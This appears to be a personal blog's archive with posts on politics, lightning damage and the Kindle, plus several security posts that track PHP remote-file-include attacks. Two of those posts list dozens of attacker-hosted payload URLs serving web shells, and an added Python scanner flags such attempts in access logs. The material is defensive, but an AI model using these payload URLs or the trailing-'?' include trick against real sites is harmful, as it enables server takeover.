Nov
Crazy php code injections
Posted by jerry as Hacking, Security, php, web site
As I’ve written about here several times, the onslaught of unsuccessful php include attacks continues. Today, I saw a new file referenced - bot.txt. It looked like this in the apache log file:
Nov
Kucinich and Paul make a good team?
Posted by jerry as Ron Paul, politics
This interview with Dennis Kucinich’s lovely & intelligent wife has moderates on both sides quite excited. Unfortunately, it can’t be. There are a few major obstacles:
- Neither appears to be on a trajectory to win their respective party primary race.
- Someone has to be VP. It’s unlikely that, though they are close on many issues, certain ideologies like abortion, will prevent each from playing second seat to the other.
- Either Paul or Kucinich would likely lose the support of their party should they win the primary and choose a running mate from the opposing party, rather than from the “talent pool” from their own party.
I agree that it would be a great presidency. There would be balance and sanity in the White House, but we are teeing up for another 4 years of craziness.
Nov
Damn lightning…
Posted by jerry as lightning
I was awoken this morning by a storm coming in. I really hate that sound in the middle of the night, because my kids are very afraid of storms. I was counting to myself how long it would take to hear the first set of footsteps.
The rain picked up and the thunder rumbled on. The kids did come down as I expected. I convinced them to play in the family room and let my wife and I sleep a bit more.
It seemed like I had just fallen asleep when I heard an explosion and felt a blinding light shine through my closed eyes. It was really close. Probably hit a tree in my back yard. Nothing seemed out of place, other than the ghost-white kids in my doorway. The aquarium in my room was still working, and the bedroom light my oldest son turned on was sure as hell working.
My wife got up shortly after, and I went back to sleep. (too many sleeping pills the night before - long story). When I did wake up, I pulled my laptop out from under the bed, and unfortunately had no Internet connection.
After a long morning of moving furniture and testing network ports, I found that I had 2 network cards die on me. One in the new PC I had recently bought, and the other in the file server/firewall server in the basement. I’ve spent a lot of money on lightning and surge protection for all of my equipment, including the cable modem, but apparently the EMP from the lightning induced a charge great enough to fry the two NICs.
Fortunately, I had some NICs lying around and got things running again, but that’s pretty frustrating. I am glad that it was nothing more serious, though.
Nov
Have CAPTCHAs been broken? Sort of…
Posted by jerry as Security, web site
I just read this article about the Hannah Montana ticket debacle, and how it points to an apparent weakness in CAPTCHA. Unfortunately, for CAPTCHA, the problem wasn’t some slick new algorithm designed by a miscreant that can reliably decipher the images, but rather establishing a network that grabs the CAPTCHA from one site, shoots it to a porn or warez web site that presents the same CAPTCHA to someone looking to score some boobies, who must answer the CAPTCHA before getting their prize.
It’s really quite clever, and I anticipate that the CAPTCHA breaking network will continue to mature, as we have seen with other malware. Someone’s going to make a business case for hosting a service that has an input API that accepts an image, and returns the CAPTCHA text, and a similar API that presents the CAPTCHA much like an online ad, and accepts the CAPTCHA text as an input. Sites that use the CAPTCHA and return a “solution” are compensated in the same model as a click through for an online ad - think of it as adsense for bad people. Except, it would be perfectly acceptable for the site owner to sit there all night and answer CAPTCHAs on his or her site, raking in the money.
On the other side, those looking to break the CAPTCHA would have to pay a small fee for a certain number of CAPTCHA credits. The money would flow to the site owners, with the service owner keeping a service charge, of course.
Honestly, that could spell the end for the widespread use of CAPTCHAs. The only way to stop this is to make the CAPTCHA too difficult to read for a human, and that defeats the whole purpose.
So, in effect, CAPTCHA was broken without really breaking it.
Nov
Are domain parking companies complicit in typo-squatting?
Posted by jerry as web site
From this article
“The domain name parking companies are providing a service. Whether or not you agree with the domain name owner’s decision to buy a certain domain name, it is not the parking company’s responsibility to police the internet and protect a company’s brand. That remains the responsibility of the brand itself. The brand or trademark owner should go after the domain owner, and not publicly lynch the domain parking companies.”
I would say that’s debatable. Think about some “real world” parallels:
Bootleg merchandise. The retailer did not manufacture fake Nike shoes, he is just selling them. It’s not his responsibility to police the goods that move through his store - that’s the responsibility of the real manufacturer.
Pirated music. Napster, Grokster, BearShare, Gnutella, and on and on, all claimed that they just provided a service, that there were legitimate, legal uses for the service, and that it was not their responsibility to police what was going through.
Picture duplication. Photo development companies claim that it’s not their responsibility to police what pictures they reproduce. The copyright holder must do something to prevent unauthorized duplication.
In all those cases, the organization felt strongly in their footing. But the key is that each one lost in a big way. Like it or not, if you’re aiding in something that’s illegal, you’re complicit. The question is where do you draw the line. Should ISPs have been held responsible in the music sharing cases? Probably not. Should the manufacturer of photo paper be held responsible for copyright infringement? Probably not. It’s a grey line, to be sure, but it seems pretty obvious that the domain parking companies are well on one side of the line. The only things missing now are lawsuits and legislation.
Nov
Conservatives Honing Gaydar?
Posted by jerry as politics
Given all of the wacky antics our conservative leadership has been, well, participating in, this, taken from Conservapedia, is pretty funny:

Make no mistake, it’s clearly been “stuffed” by someone out to “bone” the repubs, but funny none-the-less.
Nov
Electotainment
Posted by jerry as news, politics
I just finished reading this article and have to respond. The author doesn’t directly come out and say it, but is basically accusing the new media of dumbing down the political process, and we, the electorate, are the victims. We are NOT the victims… We are the cause. Have you seen what’s on TV lately? What are the most popular shows? American Idol, Dancing with the Stars, reality show du jour. The media is Pavlov’s dog, and the public has been in control of the bell for a long time. They are the monster that WE made.
It isn’t that CNN doesn’t want to let loose Hillary’s view on Yucca Mountain! CNN doesn’t want a million people saying “oh my god, this is boring shit. Let’s see what’s on Fox News. Maybe there’s a police chase or a good apartment fire we can watch.” And they’re right. I may be interested in Hillary’s view on Yucca Mountain, the credit collapse, the slowing economy, what to do with Iran, but I represent a small minority that probably doesn’t fit into their demographic anyway.
Up until recently, I hadn’t watched CNN or Fox News in about 2 years. I was really bothered by what I saw when I did have a chance to watch it recently. Every news show on CNN Headline News is presented by a “commentator”, not a reporter. I could not believe that was Headline News. It used to actually be 24 hours of an anchor person giving the news. But, they’ve adapted to what the viewers want.
For Pete’s sake, PLEASE STOP BLAMING THE MEDIA. They’re doing what they do best - sell advertising. They can’t sell advertising if no one watches their programming because “hard hitting journalism” can’t compete with Dancing with the Stars.
Nov
Current crop of php include attempts
Posted by jerry as Hacking, Security, php
I’m not sure why I’m so fascinated by this crude and ineffective hacking attempt, but I am. Here are the currently active hosts:
http://www.mta.cl/galeria2/galery2.jpg??
http://www.mta.cl/galeria2/galery.txt?
http://www.freewebtown.com/w8ting/safe.txt??
http://tools.aerofito.com/safeon.txt??
http://64.203.191.222/.check/c.txt?
http://www.ohanlonpaving.com/phpmic.txt.txt?
http://rotation.wooshck.org/image/safe.txt?
http://83.19.144.26/bo.do??
http://www.old2sold.net/newpitbulonspread.txt?
http://coolpc.com.tw/evaluate/safe?
http://www.ena-gmbh.de/download/cikos.txt?
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
http://www.freewebtown.com/komandan/tool/q3.txt?
http://www.manycontentz.com//ine/img/contr.txt??
http://ninaru.hut2.ru/images/cs.txt?
http://amygirl.land.ru/baby?
http://electro.lydo.org/rfi/id.txt?
http://freewebs.com/chika_manis_banget/cmd.txt???
http://www.martinschaab.de/php/id.txt?
http://www.realtyna.com/about.gif??
http://zamkad.ru/pub/buffer_upload/…/cmd.txt?
http://www.realtyna.com/safe.txt??
http://www.cluelesstravel.com/guestheath/id.txt??
http://bondick.net/flashchat/nick_image/htaccess?
http://kiopmanminsuion.chat.ru/http?
http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif?
http://193.109.188.20/0/templates/rhuk_solarflare_ii/css/contr.txt??
http://www.martinschaab.de/php/phpSecurePages//phpSecurePages/u.txt?
Nov
kindle hype
Posted by jerry as kindle
I’ve been bombarded with kindle news everywhere I go today. “It’s going to revolutionize the e-reading market”. Really? How big is the e-reading market? Amazon seems to have really made the device as integrated and friendly as possible, but the reality is that you’re still stuck reading on a small screen. I don’t like reading emails on my blackberry. I hate web surfing on it, but I will in a pinch. I cannot see myself “curling up” with a PDA-sized device to read a book. It’s just not going to happen. This really goes back to the days of the Palm Pilot. I remember downloading ebooks to it, thinking to myself how cool it will be to have all these books with me wherever I go. But, I never read one of them. It was just not comfortable. I have a hard time reading a book on a 19″ LCD monitor.
The price is pretty steep as well. Buying the box for $399, then needing to spend $10 to $20 per book just doesn’t seem likely. I like gadgets as much as the next guy, but I do not see myself spending money on this. In fact, I’ve been in a mode of device contraction. I had a phone, a pocket PC, and an iPod. Now, I’m down to a blackberry and an iPod, and if I could get rid of the iPod, I would.
Having said all of that, the EVDO access to content is pretty slick.
Nov
PHP include attacks rolling on…
Posted by jerry as Hacking, Security, php, search engine, web site
I’ve written about this a bit, and I’ve started a current attack list on networkstike.com, but the intensity seems to be increasing in these attempts. I decided to google one of the URLs that’s included, and right off the bat, I found this article from a web site that’s seeing the same thing. I believe these attacks are being launched from a botnet, trolling for vulnerable sites to use for some kind of illicit business.
What was really interesting to me in my google search for some of the inclusion URLs is the number of log files that are available and indexed via google. For a long time, I have gotten many hits with the referrer set to a spammy site - an obvious attempt to get some clicks and link mojo with Google. I never really thought a lot about it, but I can see that it’s probably a fairly effective thing, given the number of log files I found via google.
The current list of php inclusion hits for my sites is below:
http://www.s1ko.jazztel.es/safe.gif?
http://gw-gold.net/dragoc/id.txt?
http://musicgirll.chat.ru/wav/mysong?
http://www.mta.cl/galeria2/galery.txt?
http://www.mta.cl/galeria2/galery.jpg?
http://www.madinaedu.gov.sa/safeon.txt??
http://www.modelismo.alternativo.nom.br//poll/polldata/readme.txt??
http://shellbr.com.sapo.pt/safeon.txt??
http://zamkad.ru/pub/buffer_upload/…/cmd.txt?
http://www.volontaridelrotary2040.com/html/modules/xt_conteudo/NewFile.txt?
http://telkomsex.com/ec.txt?
http://193.109.188.20/0/templates/rhuk_solarflare_ii/css/contr.txt??
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
http://neu.sv-badbentheim.de/hide.txt?
http://www.smartlabphd.com/book/list/skin/zero_vote/images/setup_pages2.gif???
http://www.smartlabphd.com/book/list/skin/zero_vote/images/setup_pages.gif???
http://www.urjb.com/photos/albums/userpics/10001/thumb_blank.gif??
http://www.hgbruce.com/components/com_rsgallery/safeon.txt??
http://tr-igus.com/safe.txt?
http://www.valerieataylor.com/gb/book2.gif??
http://servergazi.com/portal/images/stories/web.gif??
http://hackbsd.net/.xrt/safe.gif?
http://www.freewebtown.com/w8ting/safe.txt??
http://rumusic.chat.ru/rumusic.wav?
http://ninaru.hut2.ru/images/cs.txt?
http://amygirl.land.ru/baby?
http://www.martinschaab.de/php/id.txt?
http://x0.741.com/pb.txt?
http://location-investment.com/Connections/r8.txt?
http://jjisdfiuw834wsdd.chat.ru/js?
I’ve started downloading the files and looking at them. Many of them are loosely copied off of one another, some are exactly the same. Some are quite complex, all-in-one shells that would allow complete server control. Most of them appear to give some basic information, like directory, available disk space, effective UID and GID, and the like.
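As an added example (not code from the original post), here is a small Python script that does what the host lists in this post and the “Current crop of php include attempts” post above were compiled from by hand: it reads Apache combined-format access-log lines, pulls out every query parameter whose decoded value is a remote URL, and reports the client address, the parameter, the payload URL and how many “?” were tacked onto the end. The sample log lines are constructed for the example; the client addresses and the vulnerable parameter names (page, file) are assumptions, while the two payload URLs are taken from the lists above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format. The request field holds method, target and
# protocol; the referer and user-agent fields are optional so that plain
# "common" format lines parse as well.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d" '
    r'(?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Schemes a remote file include can fetch through PHP's URL wrappers.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def find_rfi(line):
    """Return [(client_ip, param, payload_url, trailing_qmarks), ...] for every
    query parameter on this log line whose value is a remote URL.
    Returns [] for clean lines and for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    hits = []
    # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught too.
    for param, value in parse_qsl(query, keep_blank_values=True):
        v = value.strip()
        if v.lower().startswith(REMOTE_SCHEMES):
            # The attacker appends "?" (often several) so that anything the
            # vulnerable script concatenates after the URL, e.g. ".php" or
            # "/footer.inc", lands in the query string of the remote fetch
            # instead of breaking the URL.
            qmarks = len(v) - len(v.rstrip("?"))
            hits.append((m.group("ip"), param, v, qmarks))
    return hits


def scan_log(text):
    """Run find_rfi over every non-empty line of an access log."""
    hits = []
    for line in text.splitlines():
        if line.strip():
            hits.extend(find_rfi(line))
    return hits


def payload_hosts(hits):
    """Sorted, de-duplicated hosts the payloads are served from, i.e. the
    kind of 'currently active hosts' list kept in the posts above."""
    return sorted({urlsplit(url).netloc for _, _, url, _ in hits})


# Constructed sample log (not the author's real log). Client addresses and the
# parameter names "page" and "file" are assumptions; the two payload URLs are
# taken from the lists in the posts above.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Nov/2007:03:14:07 -0500] "GET /index.php?page=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
10.0.0.5 - - [21/Nov/2007:03:14:09 -0500] "GET /modules/news.php?file=http%3A%2F%2Fwww.martinschaab.de%2Fphp%2Fid.txt%3F%3F HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
192.0.2.9 - - [21/Nov/2007:08:00:01 -0500] "GET /index.php?page=about&id=42 HTTP/1.1" 200 9812 "http://example.com/" "Mozilla/5.0"
192.0.2.10 - - [21/Nov/2007:08:00:02 -0500] "GET /images/logo.gif HTTP/1.1" 200 4021
"""

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, param, url, qmarks in found:
        print(f"{ip} tried to include {url} via ?{param}= ({qmarks} trailing '?')")
    print("payload hosts:", ", ".join(payload_hosts(found)))
```

The trailing “?” is the tell: it is only useful to an attacker when the server-side script does something like include($_GET['page'] . '.php'), so a remote URL ending in one or more question marks in a query parameter is almost never legitimate traffic. Note that a 200 or 404 in the log says nothing about whether the include worked. In PHP 5.2 and later allow_url_include defaults to Off, which stops the remote fetch, but the same unvalidated include() still allows local file inclusion, so the real fix is a whitelist of allowed page names rather than relying on the php.ini setting.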